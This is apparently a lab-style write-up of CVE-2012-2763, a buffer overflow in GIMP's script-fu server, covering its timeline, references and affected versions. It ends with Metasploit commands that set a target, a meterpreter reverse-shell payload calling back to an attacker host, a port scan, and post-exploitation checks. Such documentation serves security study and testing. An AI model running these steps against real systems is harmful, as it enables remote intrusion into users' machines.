Timeline :

Vulnerability discovered by Joseph Sheridan the 2012-05-18
Public release of the vulnerability the 2012-05-19
Metasploit PoC provided the 2012-06-01

PoC provided by :

Joseph Sheridan
juan vazquez

Reference(s) :

CVE-2012-2763
OSVDB-82429
EDB-ID-18956
BID-53741

Affected version(s) :

All versions before or equal to GIMP 2.6.12 (Windows or Linux builds)

Tested on Windows XP Pro SP3 with :

GIMP 2.6.10

Description :

This module exploits a buffer overflow in the script-fu server component on GIMP versions before or equal to 2.6.12. By sending a specially crafted packet, an attacker may be able to achieve remote code execution under the context of the user. This module has been tested on GIMP for Windows from installers provided by Jernej Simoncic.

Commands :

use exploit/windows/misc/gimp_script_fu
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100

nmap -p 10008 192.168.178.22

exploit

getuid
sysinfo